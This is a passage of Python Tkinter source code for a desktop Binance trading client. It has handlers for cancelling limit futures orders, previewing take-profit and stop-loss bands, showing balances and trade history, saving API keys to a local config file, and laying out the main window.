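    # Cancel every open LIMIT order for the current symbol on the currently selected position side (PosSide).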
#print('delete order')
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders(symbol=grSmb)
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['type'])=='LIMIT' and str(BnFAcc1['positionSide'])=='LONG':
#print(BnFAcc1)
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position LONG Order LIMIT Removed [' + grSmb + '], Price: ' + str(BnFAcc1['price']) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders(symbol=grSmb)
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['type'])=='LIMIT' and str(BnFAcc1['positionSide'])=='SHORT':
#print(BnFAcc1)
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position SHORT Order LIMIT Removed [' + grSmb + '], Price: ' + str(BnFAcc1['price']) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#______________BUTTON NwOShow_CLICK BEGIN (New Order Show) - SHOW/HIDE NEW FUTURES ORDER
def click_buttonNwOShow():
global NwOrSw
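    # Preview the order typed into the price/margin fields: draws temporary TP/SL rectangles on the candle
    # chart around the entry price; the band width works out to price/(leverage+1), roughly the liquidation distance.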
if should_run_C == True and MS == 'FUTURES' and NwOrSw==False:
if PosSide == 'LONG':
k1=float(app.text_POrd.get(1.0,'end'))
k2=float(app.text_QOrd.get(1.0,'end'))
k3=(k2*float(Lvrg_Tmp))/k1
yyC =float(k1)-((float(k1)*(float(k3)/(float(Lvrg_Tmp)+1)))/float(k3))
yyC1 = grMd - (((k1+(k1-yyC))-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_TP, 850,yyC1,880,yyC2)
#print(PosSide)
yyC1 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_SL, 850,yyC1,880,yyC2)
if PosSide == 'SHORT':
#print(PosSide)
k1=float(app.text_POrd.get(1.0,'end'))
k2=float(app.text_QOrd.get(1.0,'end'))
k3=(k2*float(Lvrg_Tmp))/k1
yyC =float(k1)+((float(k1)*(float(k3)/(float(Lvrg_Tmp)+1)))/float(k3))
yyC1 = grMd - (((k1+(k1-yyC))-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_TP, 850,yyC1,880,yyC2)
yyC1 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_SL, 850,yyC1,880,yyC2)
NwOrSw=True
#print(NwOrSw)
app.button_NwOSw.config(text="HIDE", fg='red')
elif should_run_C == True and MS == 'FUTURES' and NwOrSw==True:
NwOrSw=False
app.button_NwOSw.config(text="SHOW", fg='black')
app.graph_Cn.coords(GOS_SL, 0,0,0,0)
app.graph_Cn.coords(GOS_TP, 0,0,0,0)
#______________BUTTON NwOShow_CLICK END (New Order Show) - SHOW/HIDE NEW FUTURES ORDER
#______________BUTTONS END
#______________MENU BEGIN
#______________MENU ACCOUNT_CLICK BEGIN - SHOW NEW WINDOW WITH BINANCE ACCOUNT KEYS
def clicked_Bnacc():
global rootAcc
global app_acc
rootAcc = Tk()
app_acc = AccWn(rootAcc)
rootAcc.title('Binance balances')
rootAcc.geometry('550x120+150+100')
rootAcc.resizable(width=False, height=False)
rootAcc.mainloop()
#______________MENU ACCOUNT_CLICK END - SHOW NEW WINDOW WITH BINANCE ACCOUNT KEYS
#______________MENU ACCOUNT BUTTON SAVE CLICK BEGIN - SAVE KEYS
def click_button_AccSave():
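    # Recreate the Binance client with the entered keys and persist them to iTrader.cfg
    # (API key on the first line, API secret on the second).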
global bot
global API_KEY_s
global API_SECRET_s
API_KEY_s = app_acc.text_AK.get(1.0,'end').replace("\n", "")
API_SECRET_s = app_acc.text_AS.get(1.0,'end').replace("\n", "")
if API_KEY_s != '' and API_SECRET_s != '':
bot = Binance(API_KEY=API_KEY_s, API_SECRET=API_SECRET_s)
my_file_Account = open("iTrader.cfg", "w")
sTmp = bot.API_KEY
sTmp += '\n'
sTmp += str(bot.API_SECRET, 'utf-8')
my_file_Account.write(sTmp)
my_file_Account.close()
        messagebox.showinfo("Set account KEYs", "The data was saved successfully.")
rootAcc.destroy()
#______________MENU ACCOUNT BUTTON SAVE CLICK BEGIN - SAVE KEYS
#______________MENU BALANCES_CLICK BEGIN - SHOW NEW WINDOW WITH BALANCES
def clicked_blns():
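    # Balances window with SPOT / FUTURES / MARGIN tabs: the SPOT tab lists the account flags and all
    # non-zero balances, the FUTURES tab lists the futures wallet balances; MARGIN is a placeholder.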
rootBlns = Tk()
rootBlns.title('Binance balances')
rootBlns.geometry('800x850+150+100')
tab_control = ttk.Notebook(rootBlns)
tab1 = ttk.Frame(tab_control)
tab2 = ttk.Frame(tab_control)
tab3 = ttk.Frame(tab_control)
tab_control.add(tab1, text='SPOT')
    lbl1 = Label(tab1, text='Tab 1',justify=LEFT)
lbl1.grid(column=0, row=0)
tab_control.add(tab2, text='FUTURES')
    lbl2 = Label(tab2, text='Tab 2',justify=LEFT)
lbl2.grid(column=0, row=0)
tab_control.add(tab3, text='MARGIN')
tab_control.pack(expand=1, fill='both')
#Fill Tab 1 - SPOT WALLETS
BnAcc = bot.account()
BnAcc1 = BnAcc.get('makerCommission')
sTmp = '\n 1. (makerCommission):' + str(BnAcc1)
BnAcc2 = BnAcc['takerCommission']
sTmp += '\n 2. takerCommission:' + str(BnAcc2)
BnAcc3 = BnAcc['buyerCommission']
sTmp += '\n 3. buyerCommission:' + str(BnAcc3)
BnAcc4 = BnAcc['sellerCommission']
sTmp += '\n 4. sellerCommission:' + str(BnAcc4)
BnAcc5 = BnAcc['canTrade']
sTmp += '\n 5. canTrade:' + str(BnAcc5)
BnAcc6 = BnAcc['canWithdraw']
sTmp += '\n 6. canWithdraw:' + str(BnAcc6)
BnAcc7 = BnAcc['canDeposit']
sTmp += '\n 7. canDeposit:' + str(BnAcc7)
BnAcc8 = BnAcc['updateTime']
sTmp += '\n 8. updateTime:' + str(BnAcc8)
BnAcc9 = BnAcc['accountType']
sTmp += '\n 9. accountType:' + str(BnAcc9)
BnAcc10 = BnAcc['balances']
sTmp += '\n 10. balances_len:' + str(len(BnAcc10))
BnAcc101=BnAcc10[0]
for mm in range(len(BnAcc10)):
BnAcc101 = BnAcc10[mm]
if float(BnAcc101['free']) > 0 or float(BnAcc101['locked']) > 0:
            sTmp += '\n balance: ' + str(BnAcc101['asset']) + ". Available: " + str(BnAcc101['free']) + ". Locked: " + str(BnAcc101['locked'])
BnAcc11 = BnAcc['permissions']
sTmp += "\n 11 permissions_len " + str(len(BnAcc11)) + 'permissions:'+ str(BnAcc11)
for mm in range(len(BnAcc11)):
if BnAcc11[mm] == 'SPOT':
            sTmp += "\n 11 permissions_SPOT = TRUE (spot trading)"
if BnAcc11[mm] == 'LEVERAGED':
            sTmp += "\n 11 permissions_LEVERAGED = TRUE (margin trading?)"
lbl1.config(text = sTmp)
#Fill Tab 2 - FUTURES WALLETS
sTmp = ''
BnFAcc = bot.futuresBalance()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
            sTmp += '\n balance: ' + str(BnFAcc1['asset']) + ". Total: " + str(BnFAcc1['balance']) + ". Available: " + str(BnFAcc1['withdrawAvailable'])
lbl2.config(text = sTmp)
rootBlns.mainloop()
#______________MENU BALANCES_CLICK END - SHOW NEW WINDOW WITH BALANCES
#______________MENU ORDERS_CLICK BEGIN - SHOW NEW WINDOW WITH ORDERS
def clicked_Ordrs():
rootBlns = Tk()
rootBlns.title('Binance orders')
rootBlns.geometry('800x850+150+100')
tab_control = ttk.Notebook(rootBlns)
tab1 = ttk.Frame(tab_control)
tab2 = ttk.Frame(tab_control)
tab3 = ttk.Frame(tab_control)
    tab_control.add(tab1, text='SPOT Trades')
    lbl1 = Label(tab1, text='Tab 1',justify=LEFT)
    lbl1.grid(column=0, row=0)
    tab_control.add(tab2, text='SPOT Orders')
    lbl2 = Label(tab2, text='Tab 2',justify=LEFT)
    lbl2.grid(column=0, row=0)
    tab_control.add(tab3, text='FUTURES Trades')
    lbl3 = Label(tab3, text='Tab 3',justify=LEFT)
lbl3.grid(column=0, row=0)
tab_control.pack(expand=1, fill='both')
BnAcc = bot.account()
    #This method returns the authorised user's trade history for the given pair.
    #Weight - 5.
    #Parameters:
    #Required:
    #symbol - the pair
    #timestamp - current time (filled in automatically by this code, no need to pass it)
    #Optional:
    #limit - number of trades to return (maximum 500, default 500)
    #fromId - trade id to start from. By default the most recent trades are returned.
    #recvWindow - request validity window.
BnMt = bot.myTrades(symbol=grSmb)
#print (len(BnMt))
sTmp = 'BNBUSDT'
if len(BnMt)>0:
for mm in range(len(BnMt)):
BnMtM = BnMt[mm]
sTmp += '\n 1. ' + str(datetime.datetime.fromtimestamp(BnMtM['time']/1000))
            if BnMtM['isBuyer'] == True:
                sTmp += ' Buy'
            else:
                sTmp += ' Sell'
            sTmp += '\n' + 'Price:' + str(BnMtM['price']) + '. Qty:' + str(BnMtM['qty']) + '. Total:' + str(BnMtM['quoteQty'])
            sTmp += '\n Commission:' + str(BnMtM['commissionAsset']) + ": "+ str(BnMtM['commission'])
lbl1.config(text = sTmp)
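    # Export the authorised user's recent trade history (bot.userTrades): starting one week back, trades are
    # fetched in weekly pages of up to 1000 records and written to timestamped _Trades/_PnL/_Cms/_AllTds text files.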
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("%d.%m.%Y %H-%M-%S")
my_file_Trades = open(time_local_str + "_Trades.txt", "w")
my_file_PnL = open(time_local_str + "_PnL.txt", "w")
my_file_Cms = open(time_local_str + "_Cms.txt", "w")
my_file_AllTrades = open(time_local_str + "_AllTds.txt", "w")
BnMt = bot.userTrades(fromId=1,limit=1000)
#print(BnMt[0])
TTT=int((int(time.mktime(time.localtime()))-604800)*1000)
#print(int(time.mktime(time.localtime())))
sTmp = ''
sTmp_PnL = ''
sTmpF=''
sTmpF_PnL=''
sTmp_Cms = ''
sTmpF_Cms = ''
sTmp_AT = ''
sTmpF_AT = ''
while TTT < int(int(time.mktime(time.localtime()))*1000):
BnMt = bot.userTrades(startTime=TTT,limit=1000)
sTmp = ''
sTmp_PnL = ''
sTmp_Cms = ''
sTmp_AT = ''
for i in range(len(BnMt) - 1, -1, -1):
if i > 0 and float(BnMt[i]['realizedPnl']) != 0:
sTmp += '\n' + str(datetime.datetime.fromtimestamp(BnMt[i]['time']/1000)) + '\tid:' + str(BnMt[i]['id']) + '\ts:' + str(BnMt[i]['symbol'])
sTmp += '\t' + str(BnMt[i]['positionSide']) + '\tPNL: ' + str(BnMt[i]['realizedPnl'])
sTmp += '\t\t' + str(BnMt[i]['price']) + ' * ' + str(BnMt[i]['qty']) + ' = ' + str(BnMt[i]['quoteQty'])
sTmp_PnL += '\n' + str(datetime.datetime.fromtimestamp(BnMt[i]['time']/1000)) + '\t' + str(BnMt[i]['realizedPnl'])
elif i ==0:
sTmp += ''
if i > 0 and float(BnMt[i]['commission']) > 0:
sTmp_Cms += '\n' + str(datetime.datetime.fromtimestamp(BnMt[i]['time']/1000)) + '\t' + str(BnMt[i]['commission']) + '\t' + str(BnMt[i]['commissionAsset'])
if i > 0:
sTmp_AT += '\n' + str(BnMt[i])
sTmpF =sTmp + sTmpF
sTmpF_PnL = sTmp_PnL + sTmpF_PnL
sTmpF_Cms = sTmp_Cms + sTmpF_Cms
sTmpF_AT = sTmp_AT + sTmpF_AT
TTT +=604800000
my_file_Trades.write(sTmpF)
my_file_Trades.close()
my_file_PnL.write(sTmpF_PnL)
my_file_PnL.close()
my_file_Cms.write(sTmpF_Cms)
my_file_Cms.close()
my_file_AllTrades.write(sTmpF_AT)
my_file_AllTrades.close()
lbl3.config(text = sTmp)
rootBlns.mainloop()
#______________MENU ORDERS_CLICK END - SHOW NEW WINDOW WITH ORDERS
#______________MENU END
class AccWn:
def __init__(self, window):
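        # Small form for entering the Binance API key and secret; Save stores them via click_button_AccSave.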
global API_KEY_sT
global API_SECRET_sT
self.label_AK = Label(rootAcc, text="API-Key: ", anchor=NW, justify=LEFT)
self.label_AK.place(height=30,width=70,x=1,y=10)
self.text_AK = Text(rootAcc)
self.text_AK.place(height=20,width=440,x=80,y=10)
self.label_AS = Label(rootAcc, text="API-Secret: ", anchor=NW, justify=LEFT)
self.label_AS.place(height=30,width=70,x=1,y=40)
self.text_AS = Text(rootAcc)
self.text_AS.place(height=20,width=440,x=80,y=40)
self.text_AK.insert(1.0, API_KEY_s)
self.text_AS.insert(1.0, API_SECRET_s)
self.Buttn_Acc_Sv = Button(rootAcc,text="Save",fg='green', command=click_button_AccSave)
self.Buttn_Acc_Sv.place(height=30,width=100,x=10,y=80)
self.Buttn_Acc_Cl = Button(rootAcc,text="Close",fg='black', command=rootAcc.destroy)
self.Buttn_Acc_Cl.place(height=30,width=100,x=440,y=80)
#______________MAIN WINDOW GUI BEGIN
class gui:
def __init__(self, window):
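        # Builds the main window widgets: balance labels and order-size presets on the left, the BTC/USDT
        # watcher, balances watcher and open-positions table at the top, and the manual-order panel with
        # pair, margin-type and leverage selectors on the right.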
global OrdSz
global PSDvar
#global GPSP_Tmp
# Zero empty background label - just fon
self.label_7 = Label(root, text="This IS test!", bg="white")
self.label_7.place(height=10,width=10,x=10,y=10)
# third label - Graph must be here
self.label_Grpf = Label(root, text="This IS GRAPH!", bg="lightgreen")
self.label_Grpf.place(height=500,width=510,x=10,y=150)
# fourth label - Market orders must be here
self.label_Ord = Label(root, text="This IS orders!", bg="lightgreen")
self.label_Ord.place(height=500,width=150,x=410,y=150)
#______________LEFT TOP SIDE START
# first label - balances, order size
self.label_BlnsSpt = Label(root, text="SPOT balance = 0 USDT", anchor=NW, justify=LEFT)
self.label_BlnsSpt.place(height=50,width=190,x=10,y=10)
# second label - search, TP, SL
self.label_2 = Label(root, text="FUTURES balance = 0 USDT", anchor=NW, justify=LEFT)
self.label_2.place(height=50,width=190,x=10,y=60)
#Order size
OrdSz = DoubleVar()
OrdSz.set(10)
self.OrdSz_5 = Radiobutton(text="5$", command=lambda i=5: self.OrdSz_Ch(i), variable=OrdSz, value=5,indicatoron=0)
self.OrdSz_10 = Radiobutton(text="10$", command=lambda i=10: self.OrdSz_Ch(i), variable=OrdSz, value=10,indicatoron=0)
self.OrdSz_15 = Radiobutton(text="15$", command=lambda i=15: self.OrdSz_Ch(i), variable=OrdSz, value=15,indicatoron=0)
self.OrdSz_20 = Radiobutton(text="20$", command=lambda i=20: self.OrdSz_Ch(i), variable=OrdSz, value=20,indicatoron=0)
self.OrdSz_25 = Radiobutton(text="25$", command=lambda i=25: self.OrdSz_Ch(i), variable=OrdSz, value=25,indicatoron=0)
self.OrdSz_30 = Radiobutton(text="30$", command=lambda i=30: self.OrdSz_Ch(i), variable=OrdSz, value=30,indicatoron=0)
self.OrdSz_05 = Radiobutton(text="5%", command=lambda i=0.05: self.OrdSz_Ch(i), variable=OrdSz, value=0.05,indicatoron=0)
self.OrdSz_010 = Radiobutton(text="10%", command=lambda i=0.10: self.OrdSz_Ch(i), variable=OrdSz, value=0.10,indicatoron=0)
self.OrdSz_025 = Radiobutton(text="25%", command=lambda i=0.25: self.OrdSz_Ch(i), variable=OrdSz, value=0.25,indicatoron=0)
self.OrdSz_050 = Radiobutton(text="50%", command=lambda i=0.50: self.OrdSz_Ch(i), variable=OrdSz, value=0.50,indicatoron=0)
self.OrdSz_075 = Radiobutton(text="75%", command=lambda i=0.75: self.OrdSz_Ch(i), variable=OrdSz, value=0.75,indicatoron=0)
self.OrdSz_090 = Radiobutton(text="90%", command=lambda i=0.90: self.OrdSz_Ch(i), variable=OrdSz, value=0.90,indicatoron=0)
self.OrdSz_5.place(height=15,width=30,x=10,y=115)
self.OrdSz_10.place(height=15,width=30,x=40,y=115)
self.OrdSz_15.place(height=15,width=30,x=70,y=115)
self.OrdSz_20.place(height=15,width=30,x=100,y=115)
self.OrdSz_25.place(height=15,width=30,x=130,y=115)
self.OrdSz_30.place(height=15,width=30,x=160,y=115)
self.OrdSz_05.place(height=15,width=30,x=10,y=130)
self.OrdSz_010.place(height=15,width=30,x=40,y=130)
self.OrdSz_025.place(height=15,width=30,x=70,y=130)
self.OrdSz_050.place(height=15,width=30,x=100,y=130)
self.OrdSz_075.place(height=15,width=30,x=130,y=130)
self.OrdSz_090.place(height=15,width=30,x=160,y=130)
#_______________LEFT TOP SIDE END
#_______________RIGHT TOP SIDE START
# Label BTC/USDT watch - grow/fall
self.label_BU = Label(root, text="BTC/USDT +0 %", anchor=NW, justify=LEFT)
self.label_BU.place(height=40,width=200,x=510,y=10)
# temp start/stop button - start/stop timer
self.button_2 = Button(root, text="START", command=click_button2)
self.button_2.place(height=40,width=50,x=460,y=10)
# Label FUTURES Ords + PnL
self.label_PnL = Label(root, text="FUTURES positions:\nPnL: +0 %", anchor=NW, justify=LEFT)
self.label_PnL.place(height=60,width=250,x=510,y=60)
# temp start/stop button - start/stop timer
self.button_AB = Button(root, text="START", command=click_buttonAB)
self.button_AB.place(height=60,width=50,x=460,y=60)
# Label FUTURES Hedge Mode
self.label_HM = Label(root, text="Hedge Mode: ", anchor=NW, justify=LEFT)
self.label_HM.place(height=40,width=250,x=460,y=130)
#_______________RIGHT TOP SIDE END
#_______________MIDDLE TOP SIDE START
# Listbox current orders
self.List_Ord=Listbox(selectmode=SINGLE)
self.List_Ord.place(height=150,width=300,x=210,y=10)
self.List_Ord_Scrl = Scrollbar(root,command=self.List_Ord.yview)
self.List_Ord_Scrl.place(height=150,width=10,x=510,y=10)
self.List_Ord.config(yscrollcommand=self.List_Ord_Scrl.set)
self.Tree_Ord=ttk.Treeview(selectmode='none')
self.Tree_Ord['columns']=('Symbol','PnL','Side','Price', 'Qty','Liquid')
self.Tree_Ord.column("#0",width=0,stretch=NO)
self.Tree_Ord.column("Symbol",anchor=W,width=80)
self.Tree_Ord.column("PnL",anchor=W,width=80)
self.Tree_Ord.column("Side",anchor=W,width=80)
self.Tree_Ord.column("Price",anchor=W,width=80)
self.Tree_Ord.column("Qty",anchor=W,width=80)
self.Tree_Ord.column("Liquid",anchor=W,width=80)
self.Tree_Ord.heading("#0",text="",anchor=CENTER)
self.Tree_Ord.heading("Symbol",text="Symbol",anchor=CENTER)
self.Tree_Ord.heading("PnL",text="PnL",anchor=CENTER)
self.Tree_Ord.heading("Side",text="Side",anchor=CENTER)
self.Tree_Ord.heading("Price",text="Price",anchor=CENTER)
self.Tree_Ord.heading("Qty",text="Qty",anchor=CENTER)
self.Tree_Ord.heading("Liquid",text="Liquid",anchor=CENTER)
self.Tree_Ord.place(height=150,width=300,x=210,y=10)
self.Tree_Ord_VScrl = Scrollbar(root,command=self.Tree_Ord.yview)
self.Tree_Ord_VScrl.place(height=150,width=10,x=510,y=10)
self.Tree_Ord.config(yscrollcommand=self.Tree_Ord_VScrl.set)
#_______________MIDDLE TOP SIDE END
#_______________RIGHT SIDE START
# fifth label - buttons for manual orders go here
self.label_Cmd = Label(root, text="This IS \n manual orders!", bg="lightgray", justify=LEFT)
self.label_Cmd.place(height=500,width=100,x=510,y=150)
#seventh label - symbol of pair here
self.label_P = Label(root, text="BNB/USDT", bg="lightgray", anchor=NW, justify=LEFT)
self.label_P.place(height=30,width=100,x=510,y=150)
self.CB_MrgT = Combobox(root,state="readonly")
self.CB_MrgT['values'] = ('NONE','ISOLATED', 'CROSSED')
self.CB_MrgT.current(0)
self.CB_MrgT.place(height=30,width=100,x=510,y=200)
self.CB_MrgT.bind('<<ComboboxSelected>>',self.CB_MrgT_changed)
self.CB_Lvrg = Combobox(root,state="readonly")
self.CB_Lvrg['values'] = ('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20')
self.CB_Lvrg.current(0)
self.CB_Lvrg.place(height=30,width=40,x=620,y=200)
self.CB_Lvrg.bind('<<ComboboxSelected>>',self.CB_Lvrg_changed)
self.button_MrLvSet = Button(root, text="Set", command=self.click_button_MrLvSet)
self.button_MrLvSet.place(height=30,width=50,x=660,y=200)
#PAIR SELECT
self.CB_P = Combobox(root)
self.CB_P['values'] = ('BNBUSDT', 'BTCUSDT', 'ETHUSDT', 'WAVESUSDT', 'EOSUSDT')
self.CB_P.current(0)
self.CB_P.place(height=30,width=200,x=510,y=250)
self.CB_P.bind('<<ComboboxSelected>>',self.CB_P_changed)
MPSLvar=StringVar()
MPSL_list = ['SPOT', 'FUTURES', 'MARGIN']
MPSLvar.set(MPSL_list[0])
self.MPSL = OptionMenu(root,MPSLvar,*MPSL_list,command=self.market_selected)
self.MPSL.place(height=30,width=100,x=510,y=190)
SPSLvar=StringVar()
SPSL_list = ['Все', 'USDT']
SPSLvar.set(SPSL_list[1])
self.SPSL = OptionMenu(root,SPSLvar,*SPSL_list,command=self.pair_selected)
self.SPSL.place(height=30,width=100,x=610,y=190)
#PAIR INFO LABEL TEMP
self.label_PI = Label(self.label_Cmd, text="Pair", anchor=NW, justify=LEFT)
self.label_PI.place(height=120,width=200,x=0,y=120)
self.Tree_PI=ttk.Treeview(self.label_Cmd,selectmode='none')
self.Tree_PI['columns']=('param','val')
self.Tree_PI.column("#0",width=0,stretch=NO)
self.Tree_PI.column("param",anchor=W,width=80)
self.Tree_PI.column("val",anchor=W,width=80)
self.Tree_PI.heading("#0",text="",anchor=CENTER)
self.Tree_PI.heading("param",text="Param",anchor=CENTER)
self.Tree_PI.heading("val",text="Val",anchor=CENTER)
self.Tree_PI.place(height=120,width=185,x=0,y=120)
self.Tree_PI_VScrl = Scrollbar(self.label_Cmd,command=self.Tree_PI.yview)
self.Tree_PI_VScrl.place(height=150,width=10,x=510,y=10)
self.Tree_PI.config(yscrollcommand=self.Tree_PI_VScrl.set)
self.Tree_PI.insert(parent='',index='end',iid=1,text='',values='symbol')
self.Tree_PI.insert(parent='',index='end',iid=2,text='',values='status')
self.Tree_PI.insert(parent='',index='end',iid=3,text='',values='baseAsset')
self.Tree_PI.insert(parent='',index='end',iid=4,text='',values='quoteAsset')
self.Tree_PI.insert(parent='',index='end',iid=5,text='',values='marginAsset')
self.Tree_PI.insert(parent='',index='end',iid=6,text='',values='contractType')
self.Tree_PI.insert(parent='',index='end',iid=7,text='',values='minPrice')
self.Tree_PI.insert(parent='',index='end',iid=8,text='',values='maxPrice')
self.Tree_PI.insert(parent='',index='end',iid=9,text='',values='tickSize')
self.Tree_PI.insert(parent='',index='end',iid=10,text='',values='maxQty')
self.Tree_PI.insert(parent='',index='end',iid=11,text='',values='stepSize')
#_____________Orders START
# fifth.1 label - buttons for my orders go here
self.label_CmdOrd = Label(self.label_Cmd, text="New position", bg="white", anchor=NW, justify=LEFT)
self.label_CmdOrd.place(height=300,width=200,x=0,y=350)
# fifth.2 Label - Amount
self.label_QOrd = Label(self.label_CmdOrd, text="Qty", anchor=NW, justify=LEFT)
self.label_QOrd.place(height=25,width=50,x=0,y=30)
# fifth.2 TextBox 1 - Amount
self.text_QOrd = Text(self.label_CmdOrd)
self.text_QOrd.place(height=25,width=80,x=50,y=30)
self.text_QOrd.insert('end','5')
# fifth.2 label - quote asset and leverage caption
self.label_OrdAss = Label(self.label_CmdOrd, text="USDT x 20", bg="white", anchor=NW, justify=LEFT)
self.label_OrdAss.place(height=25,width=70,x=130,y=30)
# fifth.3 Label - Price
self.label_POrd = Label(self.label_CmdOrd, text="Price", anchor=NW, justify=LEFT)
self.label_POrd.place(height=25,width=50,x=0,y=60)
# fifth.3 TextBox 2 - Price
self.text_POrd = Text(self.label_CmdOrd)
self.text_POrd.place(height=25,width=80,x=50,y=60)
self.text_POrd.insert('end','10')
# fifth.3 label - price quote asset caption
self.label_PAss = Label(self.label_CmdOrd, text="USDT", bg="white", anchor=NW, justify=LEFT)
self.label_PAss.place(height=25,width=70,x=130,y=60)
# new order LONG button - create order
self.button_NwOL = Button(self.label_CmdOrd, text="New Long", command=click_buttonNwOL)
self.button_NwOL.place(height=30,width=95,x=0,y=100)
# new order SHORT button - create order
self.button_NwOSh = Button(self.label_CmdOrd, text="New Short", command=click_buttonNwOS)
self.button_NwOSh.place(height=30,width=95,x=100,y=100)
# temp new order show
self.button_NwOSw = Button(self.label_CmdOrd, text="SHOW", command=click_buttonNwOShow)
self.button_NwOSw.place(height=30,width=95,x=0,y=150)
# close open orders
self.button_NwODel = Button(self.label_CmdOrd, text="Delete",fg='red', command=click_buttonNwODel)
self.button_NwODel.place(height=30,width=95,x=100,y=150)
#_____________Orders END
#_______________RIGHT SIDE END
#_______________BOTTOM SIDE START
# Text box - System messages must be here
self.text_Sys = Text(root, wrap=WORD)
self.text_Sys.place(height=150,width=600,x=10,y=660)
self.text_Sys.insert('end','')
self.text_Sys_Scrl = Scrollbar(root,command=self.text_Sys.yview)
self.text_Sys_Scrl.place(height=150,width=10,x=600,y=660)
self.text_Sys.config(yscrollcommand=self.text_Sys_Scrl.set)
#_______________BOTTOM SIDE END
#_______________MIDDLE-EXTRA SIDE START
self.Scale_TP = Scale(root, from_=350,to=-100,resolution=0.1,bg='lightgreen',sliderlength = 15,command=self.Scale_TP_change)
self.Scale_TP.place(height=100,width=10,x=510,y=150)
self.Scale_SL = Scale(root,from_=350,to=-100,resolution=0.1,bg='lightpink',sliderlength = 15,command=self.Scale_SL_change)
self.Scale_SL.place(height=100,width=10,x=510,y=250)
self.button_PSL = Button(root, text="Set",fg='red', command=self.click_button_PSL)
self.button_PSLR = Button(root, text="X",fg='red', command=self.click_button_PSLR)
self.button_PTP = Button(root, text="Set",fg='green', command=self.click_button_PTP)
self.button_PTPR = Button(root, text="X",fg='green', command=self.click_button_PTPR)
PSDvar = StringVar()
PSDvar.set('LONG')
self.PSDvar_L = Radiobutton(text="L", command=lambda i='LONG': self.PSDvar_Ch(i), variable=PSDvar, value='LONG',indicatoron=0)
self.PSDvar_S = Radiobutton(text="S", command=lambda i='SHORT': self.PSDvar_Ch(i), variable=PSDvar, value='SHORT',indicatoron=0)
self.PSDvar_L.place(height=30,width=30,x=510,y=190)
self.PSDvar_S.place(height=30,width=30,x=510,y=190)
#_______________MIDDLE-EXTRA SIDE END
#_______________MIDDLE SIDE START
MPSLvar=StringVar()
MPSL_list = ['TICK', 'CANDLE 1m', 'CANDLE 5m', 'CANDLE 15m', 'CANDLE 30m', 'CANDLE 1h', 'CANDLE 4h', 'CANDLE 1d', 'CANDLE SUMM']
MPSLvar.set(MPSL_list[2])
self.GRSL = OptionMenu(root,MPSLvar,*MPSL_list,command=self.graph_selected)
self.GRSL.place(height=30,width=150,x=210,y=120)
# temp start/stop button - start/stop timer
self.button_1 = Button(root, text="Start", command=click_button1)
self.button_1.place(height=30,width=200,x=470,y=120)
CYPvar=StringVar()
CYP_list = ['-50%', '-40%', '-30%', '-20%', '-10%', '0%', '+10%', '+20%', '+30%', '+40%', '+50%']
CYPvar.set(CYP_list[5])
self.Option_CYP = OptionMenu(root,CYPvar,*CYP_list,command=self.OptionCYP_selected)
self.Option_CYP.place(height=30,width=100,x=370,y=120)
#Third Market graph - Summ Candles Market trades
self.graph_Sm=Canvas(root, borderwidth=2)
self.graph_Sm.place(height=500,width=510,x=10,y=150)
self.graph_Sm.configure(scrollregion=(-500,-500,1000,1000))
#First Market graph - TICK Market trades
self.graph_1=Canvas(root, borderwidth=2)
self.graph_1.place(height=500,width=510,x=10,y=150)
self.graph_1.configure(scrollregion=(-500,-500,1000,1000))
#Second Market graph - Candles Market trades
self.graph_Cn=Canvas(root, borderwidth=2)
self.graph_Cn.place(height=500,width=510,x=10,y=150)
self.graph_Cn.configure(scrollregion=(-500,-500,1000,1000))
#TEST PAINTING START
y_axe=[]
yy=(10,10)
y_axe.append(yy)
yy=(10,180)
y_axe.append(yy)
self.graph_1.create_line(y_axe,fill="black",smooth=1)
x_axe=[]
xx=(10,180)
x_axe.append(xx)
xx=(230,180)
x_axe.append(xx)
self.graph_1.create_line(x_axe,fill="black",smooth=1)
y_axe=[]
yy=(10,250)
y_axe.append(yy)
yy=(250,250)
y_axe.append(yy)
self.graph_Cn.create_line(y_axe,fill="black",smooth=1)
x_axe=[]
xx=(250,250)
x_axe.append(xx)
xx=(250,100)
x_axe.append(xx)
self.graph_Cn.create_line(x_axe,fill="black",smooth=1)
#TEST PAINTING END
#Second Order graph - Zoom orders
self.graph_Zm=Canvas(root, borderwidth=2)
#self.graph_Zm.place(height=200,width=100,x=410,y=150)
self.graph_Zm.configure(scrollregion=(0,-500,100,1000))
#First Orders graph - Market orders
self.graph_2=Canvas(root, borderwidth=2)
self.graph_2.place(height=200,width=100,x=410,y=150)
self.graph_2.configure(scrollregion=(0,-500,100,1000))
#First scale graph - Top timer
self.graph_Tb=Canvas(root, borderwidth=2,bg="darkgray")
self.graph_Tb.place(height=30,width=510,x=10,y=150)
self.graph_Tb.configure(scrollregion=(-500,0,1000,70))
#Second scale graph - Bottom timer
self.graph_Td=Canvas(root, borderwidth=2,bg="darkgray")
self.graph_Td.place(height=30,width=510,x=10,y=500)
